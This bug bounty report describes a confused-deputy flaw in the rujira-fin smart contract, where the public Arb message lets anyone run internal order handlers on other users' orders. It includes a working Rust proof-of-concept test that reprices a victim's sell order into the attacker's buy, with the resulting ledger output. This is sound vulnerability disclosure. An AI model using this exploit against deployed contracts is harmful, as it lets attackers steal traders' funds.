### ISSUE TITLE
`ExecuteMsg::Arb` allows modifying/closing other users order leading to fund loss.

### ISSUE THREAD

**Issue by c4-bot-6** [code-423n4/rujira-bug-bounty#26]
# Lines of code

https://gitlab.com/thorchain/rujira/-/blob/main/contracts/rujira-fin/src/contract.rs?ref_type=heads#L80

# Vulnerability details

## Summary

> TLDR: `ExecuteMsg::Arb` allows modifying other users orders.

`ExecuteMsg::Arb` is a public entry point that accepts an arbitrary `Binary` payload (`then`) and self-executes it as the contract. The internal handlers `DoOrder` and `DoSwap` authenticate only that `info.sender == env.contract.address`, which an attacker satisfies by routing through `Arb`. Both handlers accept a caller-supplied `Addr` that is trusted as the order/swap owner with no further verification. This allows **any external account** to cancel, retract, reposition, or force-execute **any other user's orders** without their signature.

This could lead to attackers cancelling and modifying other users order and placing their orders with lesser price of fulfilment on the orderbook which they could then fulfil. This leads to attackers executing orders at beneficial prices and victims orders being executed at rigged prices.

## Root Cause Analysis

Two independent design decisions combine to create the vulnerability:

### 1. `Arb` is public and executes attacker-controlled messages as `self`

In `execute.rs` (L54-56), `Arb` is a public variant of `ExecuteMsg`:

```rust
Arb {
    then: Option<Binary>,
},
```

In `contract.rs` (L100-106), the handler blindly self-executes whatever `then` contains:

```rust
if let Some(msg) = then {
    messages.push(CosmosMsg::Wasm(WasmMsg::Execute {
        contract_addr: env.contract.address.to_string(),  // self-call
        msg,                                               // attacker-controlled
        funds: info.funds,
    }))
}
```

There is **no restriction** on who can call `Arb`, and `then` is deserialized as any valid `ExecuteMsg`, including the "internal-only" `DoOrder` and `DoSwap`.

### 2. `DoOrder`/`DoSwap` trust a caller-supplied address as the owner

In `contract.rs` (L166-178), `DoOrder` accepts `recipient` from the message payload and passes it directly to `OrderManager::new` as the owner:

```rust
ExecuteMsg::DoOrder((recipient, (vec, callback))) => {
    ensure_eq!(
        info.sender,
        env.contract.address,      // ← only checks self-call
        ContractError::Unauthorized {}
    );

    let mut e = OrderManager::new(
        &config,
        recipient.clone(),          // ← attacker-controlled, used as owner
        env.block.time,
        NativeBalance(info.funds),
    );

    let mut res = e.execute_orders(deps.storage, &swap_iter, vec, &oracle)?;
```

`OrderManager::new` (L37) stores this as `self.owner`, and `execute_orders` (L62) loads and mutates orders belonging to that address:

```rust
let mut pool = Pool::load(storage, &price, &side, oracle);
match pool.load_order(storage, &self.owner) {    // ← loads victim's order
    Ok(mut order) => {
        self.execute_existing_order(storage, &mut pool, &mut order, &side, target)?
    }
```

The same pattern applies to `DoSwap` (L111-164), where `sender` controls who receives swap proceeds.

## POC

Here in the POC we show the following:

1. Attacker places a buy order at a heavily discounted price (e.g., 500 for an asset worth 1000).
2. Attacker uses the Arb to retract the victim's sell at 1000 and recreate it at 500, there is no need for funds because both the orders are in same Arb orders so the funds from the first cancel orders are reused to recreate the second order.
3. FIN's `execute_new_order` automatically matches the repositioned sell against the best opposite-side liquidity at that price. **The attacker's buy IS that liquidity.**
4. The victim's assets are immediately sold into the attacker's order at half the fair price.
5. Attacker withdraws fills and closes their order to realize the profit.

### Step by Step POC

1. git clone https://gitlab.com/thorchain/rujira/
2. Add this patch file to apply.patch

```diff
diff --git a/contracts/rujira-fin/Cargo.toml b/contracts/rujira-fin/Cargo.toml
index 95db66c..2d4dbee 100644
--- a/contracts/rujira-fin/Cargo.toml
+++ b/contracts/rujira-fin/Cargo.toml
@@ -39,8 +39,9 @@ serde             = { workspace = true }
 thiserror         = { workspace = true }
 
 [dev-dependencies]
+anyhow                = { workspace = true }
 cw-multi-test         = { workspace = true }
-rujira-bow            = { path = "../rujira-bow" }
-rujira-ghost-vault    = { path = "../rujira-ghost-vault" }
+rujira-bow            = { path = "../rujira-bow", features = ["mock"] }
+rujira-ghost-vault    = { path = "../rujira-ghost-vault", features = ["mock"] }
 rujira-rs-testing     = { workspace = true }
 rujira-thorchain-swap = { path = "../rujira-thorchain-swap", features = ["mock"] }
diff --git a/contracts/rujira-fin/src/contract.rs b/contracts/rujira-fin/src/contract.rs
index e5eb90e..25e207d 100644
--- a/contracts/rujira-fin/src/contract.rs
+++ b/contracts/rujira-fin/src/contract.rs
@@ -477,6 +477,149 @@ mod tests {
         assert_eq!(book.quote.len(), 1);
     }
 
+    /// PoC: "Confused Deputy via Arb Trampoline" – Full value extraction.
+    ///
+    /// 1. Victim sells 200 BTC @ 1000 (fair). Attacker buys @ 500 (trap).
+    /// 2. Attacker calls Arb to retract victim's sell and recreate it at 500.
+    /// 3. FIN's execute_new_order instantly matches it against attacker's buy.
+    /// 4. Attacker withdraws fills. Net: attacker +100k USDC, victim -100k USDC.
+    #[test]
+    fn poc_forced_adverse_execution() {
+        let (mut app, contract) = setup();
+        let victim = app.api().addr_make("victim");
+        let attacker = app.api().addr_make("attacker");
+
+        let fair_price = Price::Fixed(Decimal::from_str("1000.00").unwrap());
+        let rigged_price = Price::Fixed(Decimal::from_str("500.000").unwrap());
+        let victim_size = 200u128;
+        let start = 500_000_000_000_000u128;
+        let funds = vec![coin(start, "btc-btc"), coin(start, "eth-usdc")];
+
+        app.init_modules(|router, _, storage| {
+            router.bank.init_balance(storage, &victim, funds.clone()).unwrap();
+            router.bank.init_balance(storage, &attacker, funds.clone()).unwrap();
+        });
+
+        // -- Phase 1: Order placement (no exploit yet) --------------------
+
+        // Victim: sell 200 BTC @ 1000. Normal fill → 200,000 USDC.
+        app.execute_contract(
+            victim.clone(),
+            contract.clone(),
+            &ExecuteMsg::Order((
+                vec![(Side::Base, fair_price.clone(), Some(Uint128::from(victim_size)))],
+                None,
+            )),
+            &funds,
+        )
+        .unwrap();
+
+        // Attacker: buy @ 500 (doesn't cross the sell @ 1000).
+        app.execute_contract(
+            attacker.clone(),
+            contract.clone(),
+            &ExecuteMsg::Order((
+                vec![(Side::Quote, rigged_price.clone(), Some(Uint128::from(100_000_000u128)))],
+                None,
+            )),
+            &funds,
+        )
+        .unwrap();
+
+        // Sanity: both sides have resting liquidity, no crossing.
+        let book: BookResponse = app.wrap().query_wasm_smart(
+            contract.clone(),
+            &QueryMsg::Book { limit: None, offset: None },
+        ).unwrap();
+        assert!(!book.base.is_empty() && !book.quote.is_empty());
+
+        // -- Phase 2: The attack -----------------------------------------
+
+        // Arb trampoline → DoOrder(victim): retract @ 1000, recreate @ 500.
+        // Recreating at 500 instantly matches against attacker's buy.
+        let attack_msg = ExecuteMsg::Arb {
+            then: Some(to_json_binary(&ExecuteMsg::DoOrder((
+                victim.clone(),
+                (
+                    vec![
+                        (Side::Base, fair_price.clone(), Some(Uint128::zero())),
+                        (Side::Base, rigged_price.clone(), Some(Uint128::from(victim_size))),
+                    ],
+                    None,
+                ),
+            ))).unwrap()),
+        };
+        app.execute_contract(attacker.clone(), contract.clone(), &attack_msg, &[]).unwrap();
+
+        // -- Phase 3: Settlement -----------------------------------------
+
+        // Attacker closes out: withdraw BTC fills + cancel remainder.
+        app.execute_contract(
+            attacker.clone(),
+            contract.clone(),
+            &ExecuteMsg::Order((
+                vec![(Side::Quote, rigged_price.clone(), Some(Uint128::zero()))],
+                None,
+            )),
+            &[],
+        )
+        .unwrap();
+
+        // -- Phase 4: Balance verification --------------------------------
+
+        // Helper to query a balance as i128 delta from `start`.
+        let bal = |addr: &Addr, denom: &str| -> i128 {
+            app.wrap().query_balance(addr.to_string(), denom).unwrap().amount.u128() as i128
+                - start as i128
+        };
+
+        // No open orders remain for either party.
+        let query_orders = |addr: &Addr| -> OrdersResponse {
+            app.wrap().query_wasm_smart(
+                contract.clone(),
+                &QueryMsg::Orders { owner: addr.to_string(), side: None, offset: None, limit: None },
+            ).unwrap()
+        };
+        assert_eq!(query_orders(&victim).orders.len(), 0);
+        assert_eq!(query_orders(&attacker).orders.len(), 0);
+
+        // Net changes from absolute starting balances.
+        let victim_btc = bal(&victim, "btc-btc");
+        let victim_usdc = bal(&victim, "eth-usdc");
+        let attacker_btc = bal(&attacker, "btc-btc");
+        let attacker_usdc = bal(&attacker, "eth-usdc");
+
+        // Print ledger (visible with `cargo test -- --nocapture`).
+        println!("\n--- Forced Adverse Execution: Balance Ledger ---");
+        println!("  Fair price: 1 BTC = 1,000 USDC | Rigged: 1 BTC = 500 USDC");
+        println!("  Victim order: sell {} BTC", victim_size);
+        println!();
+        println!("  Net change from start:");
+        println!("    Victim:   {:>+6} BTC  {:>+10} USDC", victim_btc, victim_usdc);
+        println!("    Attacker: {:>+6} BTC  {:>+10} USDC", attacker_btc, attacker_usdc);
+        let victim_pnl = victim_btc * 1000 + victim_usdc;
+        let attacker_pnl = attacker_btc * 1000 + attacker_usdc;
+        println!();
+        println!("  P&L at fair price (1 BTC = 1,000 USDC):");
+        println!("    Victim:   {:>+10} USDC", victim_pnl);
+        println!("    Attacker: {:>+10} USDC", attacker_pnl);
+        println!("---\n");
+
+        // Victim lost exactly 200 BTC, received 100,000 USDC (rigged, not 200,000 fair).
+        assert_eq!(victim_btc, -(victim_size as i128));
+        assert_eq!(victim_usdc, (victim_size as i128) * 500);
+
+        // Attacker gained 200 BTC, paid 100,000 USDC.
+        assert_eq!(attacker_btc, victim_size as i128);
+        assert_eq!(attacker_usdc, -((victim_size as i128) * 500));
+
+        // P&L: attacker profit = victim loss = 100,000 USDC.
+        let expected_loss = (victim_size as i128) * (1000 - 500); // 100,000
+        assert_eq!(victim_pnl, -expected_loss);
+        assert_eq!(attacker_pnl, expected_loss);
+        assert_eq!(attacker_pnl, -victim_pnl, "zero-sum");
+    }
+
     #[test]
     fn instantiation() {
         let mut app = mock_rujira_app();
diff --git a/contracts/rujira-fin/src/lib.rs b/contracts/rujira-fin/src/lib.rs
index 550299c..f70e04e 100644
--- a/contracts/rujira-fin/src/lib.rs
+++ b/contracts/rujira-fin/src/lib.rs
@@ -15,5 +15,5 @@ pub use crate::error::ContractError;
 #[cfg(test)]
 mod testing;
 
-#[cfg(feature = "mock")]
+#[cfg(any(feature = "mock", test))]
 pub mod mock;
diff --git a/contracts/rujira-thorchain-swap/Cargo.toml b/contracts/rujira-thorchain-swap/Cargo.toml
index bdedab2..989ee04 100644
--- a/contracts/rujira-thorchain-swap/Cargo.toml
+++ b/contracts/rujira-thorchain-swap/Cargo.toml
@@ -18,7 +18,7 @@ crate-type = ["cdylib", "rlib"]
 [features]
 # use library feature to disable all instantiate/execute/query exports
 library = []
-mock    = ["anyhow", "cw-multi-test", "rujira-rs-testing", "rujira-ghost-vault"]
+mock    = ["anyhow", "cw-multi-test", "rujira-rs-testing", "rujira-ghost-vault/mock"]
 
 [dependencies]
 anyhow             = { workspace = true, optional = true }

```

> The files adds the test along with some dependencies issues that I was having.

3. `cd rujira`
4. `git apply ../apply.patch`
4. `cargo test --package rujira-fin --lib -- contract::tests::poc_forced_adverse_execution --exact --nocapture`

### Output of POC and what it means

```bash
--- Forced Adverse Execution: Balance Ledger ---
  Fair price: 1 BTC = 1,000 USDC | Rigged: 1 BTC = 500 USDC
  Victim order: sell 200 BTC

  Net change from start:
    Victim:     -200 BTC     +100000 USDC
    Attacker:   +200 BTC     -100000 USDC

  P&L at fair price (1 BTC = 1,000 USDC):
    Victim:      -100000 USDC
    Attacker:    +100000 USDC
---
```

The victim places the sell order of 200BTC at 1000 price, but the attacker changed the victim order's price to 500 and placed their own buy order to buy at that price.

Finally victims sell order and attackers buy orders were matched at 500, leading to a loss for victim and a profit for the attacker.

**Comment by thebrittfactor** [comment]
Sponsors confirmed this is a duplicate of [Issue code-423n4/rujira-bug-bounty#24](https://github.com/code-423n4/rujira-bug-bounty/issues/24)
